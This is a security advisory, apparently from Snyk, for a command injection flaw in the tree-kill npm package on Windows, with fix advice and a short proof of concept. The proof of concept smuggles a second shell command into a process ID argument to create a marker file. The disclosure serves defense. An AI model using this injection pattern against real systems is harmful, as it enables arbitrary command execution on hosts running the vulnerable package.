Command Injection Affecting tree-kill package, versions <1.2.2



    Exploit Maturity Proof of concept
    Attack Complexity High
    Confidentiality High
    Integrity High
    Availability High
Expand this section
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-TREEKILL-536781
  • published 5 Dec 2019
  • disclosed 4 Dec 2019
  • credit mik317

How to fix?

Upgrade tree-kill to version 1.2.2 or higher.


tree-kill is a package to kill all processes in the process tree, including the root process.

Affected versions of this package are vulnerable to Command Injection. User input is concatenated with a command within tree-kill and treekill that will be executed without any check.

Note: This vulnerability is only applicable if the package is used on a Windows operating system.

PoC by mik317

  1. Create this POC file

    var kill = require('tree-kill');
    kill('3333332 & echo "HACKED" > HACKED.txt & ');
  2. Execute the following commands in another terminal:

    npm i tree-kill # Install affected module
    dir # Check *HACKED.txt* doesn't exist
    node poc.js #  Run the PoC
    dir # Now *HACKED.txt* exists :)
  3. A new file called HACKED.txt will be created, containing the HACKED string